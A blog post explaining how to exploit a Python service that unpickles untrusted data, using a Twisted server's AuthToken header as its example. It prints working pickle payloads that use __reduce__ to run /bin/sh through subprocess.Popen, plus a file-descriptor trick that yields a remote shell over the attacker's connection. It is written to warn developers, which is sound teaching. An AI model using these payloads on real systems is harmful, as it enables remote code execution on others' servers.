Exploiting misuse of Python's "pickle"

If you program in Python, you’re probably familiar with the pickle serialization library, which provides for efficient binary serialization and loading of Python datatypes. Hopefully, you’re also familiar with the warning printed prominently near the start of pickle’s documentation:

Warning: The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.

Recently, however, I stumbled upon a project that was accepting and unpacking untrusted pickles over the network, and a poll of some friends revealed that few of them were aware of just how easy it is to exploit a service that does this. As such, this blog post will describe exactly how trivial it is to exploit such a service, using a simplified version of the code I recently encountered as an example. Nothing in here is novel, but it’s interesting if you haven’t seen it.

The Target

The vulnerable code was a Twisted server that listened over SSL. The code looked roughly like the following:

class VulnerableProtocol(protocol.Protocol):
  def dataReceived(self, data):

     # Code to actually parse incoming data according to an
     #  internal state machine
     # If we just finished receiving headers, call verifyAuth() to
       check authentication

  def verifyAuth(self, headers):
    try:
      token = cPickle.loads(base64.b64decode(headers['AuthToken']))
      if not check_hmac(token['signature'], token['data'], getSecretKey()):
        raise AuthenticationFailed
      self.secure_data = token['data']
    except:
      raise AuthenticationFailed

So, if we just send a request that looks something like:

AuthToken: <pickle here>

The server will happily unpickle it.

Executing Code

So, what can we do with that? Well, pickle is supposed to allow us to represent arbitrary objects. An obvious target is Python’s subprocess.Popen objects – if we can trick the target into instantiating one of those, they’ll be executing arbitrary commands for us! To generate such a pickle, however, we can’t just create a Popen object and pickle it; For various mostly-obvious reasons, that won’t work. We could read up on the “pickle” format and construct a stream by hand, but it turns out there is no need to.

pickle allows arbitrary objects to declare how they should be pickled by defining a __reduce__ method, which should return either a string or a tuple describing how to reconstruct this object on unpacking. In the simplest form, that tuple should just contain

A callable (which must be either a class, or satisfy some other, odder, constraints), and
A tuple of arguments to call that callable on.

pickle will pickle each of these pieces separately, and then on unpickling, will call the callable on the provided arguments to construct the new object.

And so, we can construct a pickle that, when un-pickled, will execute /bin/sh, as follows:

import cPickle
import subprocess
import base64

class RunBinSh(object):
  def __reduce__(self):
    return (subprocess.Popen, (('/bin/sh',),))

print base64.b64encode(cPickle.dumps(RunBinSh()))

Getting a Remote Shell

At this point, we’ve basically won. We can run arbitrary shell commands on the target, and there are any number of ways we could bootstrap from here up to an interactive shell and whatever else we might want.

For completeness, I’ll explain what I did, since it’s a moderately cute trick. subprocess.Popen lets us select which file descriptors to attach to stdin, stdout, and stderr for the new process by passing integers for the stdin and similarly-named arguments, so we can open our /bin/sh on arbitrarily-numbered fd’s.

However, as mentioned above, the target server uses Twisted, and it serves all requests in the same thread, using an asynchronous event-driven model. This means we can’t necessarily predict which file descriptor on the server will correspond to our socket, since it depends on how many other clients are connected.

It also means, however, that every time we connect to the server, we’ll open a new socket inside the same server process. So, let’s guess that the server has fewer than, say, 20 concurrent connections at the moment. If we connect to the server’s socket 20 times, that will open 20 new file descriptors in the server. Since they’ll get assigned sequentially, one of them will almost certainly be fd 20. Then, we can generate a pickle like so, and send it over:

import cPickle
import subprocess
import base64

class Exploit(object):
  def __reduce__(self):
    fd = 20
    return (subprocess.Popen,
            (('/bin/sh',), # args
             0,            # bufsize
             None,         # executable
             fd, fd, fd    # std{in,out,err}
             ))

print base64.b64encode(cPickle.dumps(Exploit()))

We’ll open a /bin/sh on fd 20, which should be one of our 20 connections, and if all goes well, we’ll see a prompt printed to one of those. We’ll send some junk on that fd until we manage to get the original server to error out and close the connection, and we’ll be left talking to /bin/sh over a socket. Game over.

In Conclusion

Again, nothing here should be novel, nor would I expect any of these pieces to take a competent hacker more than few minutes to figure out, given the problem. But if this blog post teaches someone not to use pickle on untrusted data, then it will be worth it.

Made of Bugs

It's software. It's made of bugs.

Exploiting misuse of Python's "pickle"

The Target

Executing Code

Getting a Remote Shell

In Conclusion

The Target 🔗︎

Executing Code 🔗︎

Getting a Remote Shell 🔗︎

In Conclusion 🔗︎

The Target

Executing Code

Getting a Remote Shell

In Conclusion